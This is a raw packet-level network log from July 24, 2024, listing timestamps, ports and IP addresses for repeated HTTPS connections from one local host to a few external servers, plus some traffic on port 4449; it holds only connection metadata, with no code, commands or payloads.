Jul 24, 2024 19:57:28.301384926 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:28.301389933 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:28.301455975 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:28.301829100 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:28.348498106 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:29.665680885 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:29.665776968 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:29.675723076 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:29.759449005 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:29.759449005 CEST	49791	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:29.759476900 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:29.759488106 CEST	443	49791	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:29.860654116 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:29.860699892 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:29.868748903 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:29.869616032 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:29.869632006 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:30.548825979 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:30.548857927 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:30.550889015 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:30.553771973 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:30.553808928 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:30.556188107 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:30.556201935 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:30.556340933 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:30.560410023 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:30.600523949 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:30.755330086 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:30.755377054 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:30.759475946 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:30.760020018 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:30.760035992 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:31.286290884 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:31.288307905 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:31.298703909 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:31.298722982 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:31.299132109 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:31.301052094 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:31.301127911 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:31.301134109 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:31.518289089 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:31.518623114 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:31.523765087 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:31.542782068 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:31.542812109 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:31.542830944 CEST	49792	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:31.542839050 CEST	443	49792	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:31.652257919 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:31.652297020 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:31.654314041 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:31.654831886 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:31.654840946 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:32.004751921 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:32.004861116 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:32.017126083 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:32.030025959 CEST	49793	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:32.030052900 CEST	443	49793	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:32.343611956 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:32.352505922 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:32.358304024 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:32.370476007 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:32.370503902 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:32.378751993 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:32.378762007 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:32.378942013 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:32.379160881 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:32.420491934 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:33.706556082 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:33.706676006 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:33.710625887 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:33.735831022 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:33.735852003 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:33.735877037 CEST	49794	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:33.735883951 CEST	443	49794	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:33.852840900 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:33.852921963 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:33.853420973 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:33.853985071 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:33.854017973 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:34.438189030 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:34.439327955 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:34.442048073 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:34.442059994 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:34.442136049 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:34.442142010 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:34.442356110 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:34.442612886 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:34.484497070 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:35.786632061 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:35.786751032 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:35.788979053 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:35.806334972 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:35.806356907 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:35.806370974 CEST	49795	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:35.806377888 CEST	443	49795	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:35.910435915 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:35.910537958 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:35.916712046 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:35.917422056 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:35.917448044 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:36.212928057 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.212970972 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.213090897 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.213454962 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.213470936 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.583563089 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:36.584094048 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:36.587083101 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:36.587100983 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:36.587299109 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:36.587306976 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:36.587388992 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:36.592967987 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:36.640496016 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:36.715910912 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.718743086 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.894846916 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.894872904 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.895262957 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.919488907 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.920074940 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.920099974 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.920411110 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.920433998 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.920631886 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.920663118 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.920859098 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.920885086 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.929188967 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.929222107 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.929459095 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.929480076 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.929492950 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.929503918 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.932533979 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.932558060 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.932579041 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.932590961 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.932696104 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.932715893 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:36.932730913 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.932754993 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.932928085 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:36.940376997 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:37.853843927 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:37.854005098 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:37.864490032 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:37.882843971 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:37.882930040 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:37.882966042 CEST	49796	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:37.882987022 CEST	443	49796	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:37.992008924 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:37.992060900 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:38.001568079 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:38.002119064 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:38.002136946 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:38.616607904 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:38.616621971 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:38.617599964 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:38.620274067 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:38.620282888 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:38.620459080 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:38.620462894 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:38.620527029 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:38.621792078 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:38.664495945 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:39.330444098 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:39.330563068 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:39.342674017 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:39.397835016 CEST	49797	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:39.397872925 CEST	443	49797	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:39.575922966 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:39.575975895 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:39.583841085 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:39.584244967 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:39.584261894 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:39.968547106 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:39.968626976 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:39.971019030 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:39.988899946 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:39.988929987 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:39.988945007 CEST	49798	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:39.988951921 CEST	443	49798	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:40.090143919 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:40.090193033 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:40.092170954 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:40.093027115 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:40.093039036 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:40.121376991 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.121393919 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.123476982 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:40.131114006 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:40.131139040 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.131503105 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.135724068 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:40.135751963 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:40.135826111 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.592006922 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.592111111 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.592751026 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:40.595504045 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:40.595535040 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.595550060 CEST	49800	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:40.595556974 CEST	443	49800	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:40.725055933 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:40.728701115 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:40.731529951 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:40.731550932 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:40.737781048 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:40.737806082 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:40.737989902 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:40.738365889 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:40.780504942 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:41.361002922 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:41.361052036 CEST	443	49803	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:41.361119032 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:41.361476898 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:41.361498117 CEST	443	49803	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:41.718767881 CEST	4449	49784	193.222.96.24	192.168.2.10
Jul 24, 2024 19:57:41.719496012 CEST	49784	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:57:41.841011047 CEST	443	49803	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:41.841093063 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:42.033860922 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:42.033934116 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:42.033972025 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:42.052047968 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:42.052069902 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:42.052110910 CEST	49801	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:42.052118063 CEST	443	49801	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:42.161149979 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:42.161235094 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:42.161317110 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:42.161864996 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:42.161895037 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:42.843844891 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:42.843925953 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:42.846762896 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:42.846774101 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:42.846842051 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:42.846847057 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:42.846885920 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:42.846890926 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:42.847029924 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:42.847167969 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:42.888495922 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:43.743283033 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:43.743356943 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:43.743540049 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:43.762927055 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:43.762950897 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:43.762988091 CEST	49804	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:43.762995958 CEST	443	49804	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:43.864222050 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:43.864263058 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:43.864360094 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:43.864793062 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:43.864803076 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:44.435811996 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:44.435906887 CEST	443	49803	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:44.436275959 CEST	443	49803	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:44.437925100 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:44.437973022 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:44.438026905 CEST	443	49803	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:44.499979019 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:44.500055075 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:44.503493071 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:44.503503084 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:44.503563881 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:44.503567934 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:44.503608942 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:44.503612995 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:44.503750086 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:44.503910065 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:44.548501015 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:45.059566975 CEST	49784	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:57:45.059906960 CEST	49807	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:57:45.064541101 CEST	4449	49784	193.222.96.24	192.168.2.10
Jul 24, 2024 19:57:45.064815998 CEST	4449	49807	193.222.96.24	192.168.2.10
Jul 24, 2024 19:57:45.065587044 CEST	49807	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:57:45.065979958 CEST	49807	4449	192.168.2.10	193.222.96.24
Jul 24, 2024 19:57:45.071027040 CEST	4449	49807	193.222.96.24	192.168.2.10
Jul 24, 2024 19:57:45.110915899 CEST	443	49803	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:45.111032963 CEST	443	49803	172.67.213.85	192.168.2.10
Jul 24, 2024 19:57:45.111258030 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:45.866116047 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:45.866198063 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:45.866255999 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:45.885845900 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:45.885845900 CEST	49806	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:45.885865927 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:45.885878086 CEST	443	49806	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:45.989101887 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:45.989140034 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:45.989202976 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:45.989770889 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:45.989780903 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:46.613462925 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:46.613565922 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:46.638820887 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:46.638838053 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:46.638897896 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:46.638932943 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:46.639080048 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:46.639086008 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:46.639843941 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:46.640818119 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:46.688517094 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:47.721474886 CEST	49803	443	192.168.2.10	172.67.213.85
Jul 24, 2024 19:57:48.008411884 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:48.008500099 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:48.008570910 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:48.028508902 CEST	49808	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:48.028529882 CEST	443	49808	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:48.129786015 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:48.129841089 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:48.129985094 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:48.130738020 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:48.130752087 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:48.841193914 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:48.841265917 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:48.844615936 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:48.844626904 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:48.844757080 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:48.844768047 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:48.844866037 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:48.845033884 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:48.892499924 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:49.821827888 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:49.822000027 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:49.822072029 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:49.848556995 CEST	49809	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:49.848588943 CEST	443	49809	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:49.848627090 CEST	49809	443	192.168.2.10	167.235.128.153
